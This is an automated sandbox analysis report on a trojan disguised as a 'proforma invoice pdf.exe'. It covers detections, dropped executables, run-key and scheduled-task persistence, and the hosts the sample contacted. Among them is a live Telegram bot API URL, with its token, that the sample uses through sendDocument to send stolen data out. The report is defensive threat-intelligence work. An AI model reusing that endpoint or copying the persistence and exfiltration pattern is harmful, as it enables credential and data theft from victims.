DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
proforma invoice pdf.exe	33%	Virustotal		Browse
proforma invoice pdf.exe	63%	ReversingLabs	Win32.Trojan.Nekark
proforma invoice pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wTyVrj.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	33%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	63%	ReversingLabs	Win32.Trojan.Nekark
C:\Users\user\AppData\Roaming\wTyVrj.exe	33%	Virustotal		Browse
C:\Users\user\AppData\Roaming\wTyVrj.exe	63%	ReversingLabs	Win32.Trojan.Nekark

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
api.ipify.org	104.26.12.205	true	false	high
api.telegram.org	149.154.167.220	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.ipify.org	proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003211000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/	proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003211000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.000000000334A000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003395000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	proforma invoice pdf.exe, 00000000.00000002.1479924222.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, proforma invoice pdf.exe, 0000000A.00000002.3912138342.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 0000000B.00000002.1531716100.0000000002378000.00000004.00000800.00020000.00000000.sdmp, wTyVrj.exe, 00000010.00000002.3911447265.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000011.00000002.1631976940.0000000002FD8000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000014.00000002.3913664418.0000000003211000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000016.00000002.1695497323.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, bmBOz.exe, 00000019.00000002.3911170216.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	proforma invoice pdf.exe, bmBOz.exe.10.dr, wTyVrj.exe.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585873
Start date and time:	2025-01-08 12:29:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	proforma invoice pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@35/32@5/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 385 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.242.39.171, 23.56.254.164
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:30:31	API Interceptor	3936077x Sleep call for process: proforma invoice pdf.exe modified
06:30:32	API Interceptor	30x Sleep call for process: powershell.exe modified
06:30:35	API Interceptor	137222x Sleep call for process: wTyVrj.exe modified
06:30:44	API Interceptor	6176876x Sleep call for process: bmBOz.exe modified
12:30:33	Task Scheduler	Run new task: wTyVrj path: C:\Users\user\AppData\Roaming\wTyVrj.exe
12:30:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bmBOz C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe
12:30:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bmBOz C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	spreadmalware.exe	Get hash	malicious	XWorm	Browse
	random.exe	Get hash	malicious	CStealer	Browse
	random.exe	Get hash	malicious	CStealer	Browse
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc	Browse
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Resource.exe	Get hash	malicious	Blank Grabber	Browse
	user.exe	Get hash	malicious	Unknown	Browse
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.26.12.205	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	api.ipify.org/
	jgbC220X2U.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=text
	xKvkNk9SXR.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	GD8c7ARn8q.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	8AbMCL2dxM.exe	Get hash	malicious	RCRU64, TrojanRansom	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	mail (4).eml	Get hash	malicious	Unknown	Browse	172.67.74.152
	random.exe	Get hash	malicious	CStealer	Browse	104.26.12.205
	random.exe	Get hash	malicious	CStealer	Browse	172.67.74.152
	http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/	Get hash	malicious	Gabagool	Browse	104.26.13.205
	Ref#66001032.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse	104.26.13.205
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
api.telegram.org	spreadmalware.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	149.154.167.220
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
bg.microsoft.map.fastly.net	Payment-Order #24560274 for 8,380 USD.exe	Get hash	malicious	XWorm	Browse	199.232.214.172
	PEDIDO DE COMPRAS OC 1203 CRI234.xlsx.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	199.232.210.172
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	199.232.214.172
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	e-SPT Masa PPh.exe	Get hash	malicious	BlackMoon	Browse	199.232.210.172
	e-SPT Masa PPh.exe	Get hash	malicious	BlackMoon	Browse	199.232.210.172
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	199.232.214.172
	I6la3suRdt.exe	Get hash	malicious	AsyncRAT	Browse	199.232.214.172
	c2.hta	Get hash	malicious	Remcos	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	spreadmalware.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc	Browse	149.154.167.220
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://t.me/hhackplus	Get hash	malicious	Unknown	Browse	149.154.167.99
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	user.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	UpdaterTool.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
CLOUDFLARENETUS	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	random.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Q1 Statements.html	Get hash	malicious	Unknown	Browse	104.18.95.41
	174.exe	Get hash	malicious	Xmrig	Browse	104.21.95.99
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://wetransfert-devis-factgfd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	104.21.32.1
	mail (4).eml	Get hash	malicious	Unknown	Browse	104.18.1.150
	https://www.dollartip.info/neuro	Get hash	malicious	Unknown	Browse	104.18.36.7

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	174.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220 104.26.12.205
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	149.154.167.220 104.26.12.205
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	149.154.167.220 104.26.12.205
	invoice-1623385214 pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	149.154.167.220 104.26.12.205
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	149.154.167.220 104.26.12.205
	c2.hta	Get hash	malicious	Remcos	Browse	149.154.167.220 104.26.12.205
	http://xyft.zmdusdxj.ru	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	Globalfoundries eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	c2.hta	Get hash	malicious	Remcos	Browse	149.154.167.220 104.26.12.205

Process:	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\proforma invoice pdf.exe.log

Download File

Process:	C:\Users\user\Desktop\proforma invoice pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wTyVrj.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\wTyVrj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3blbxbq4.5or.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4huqn10l.k5b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
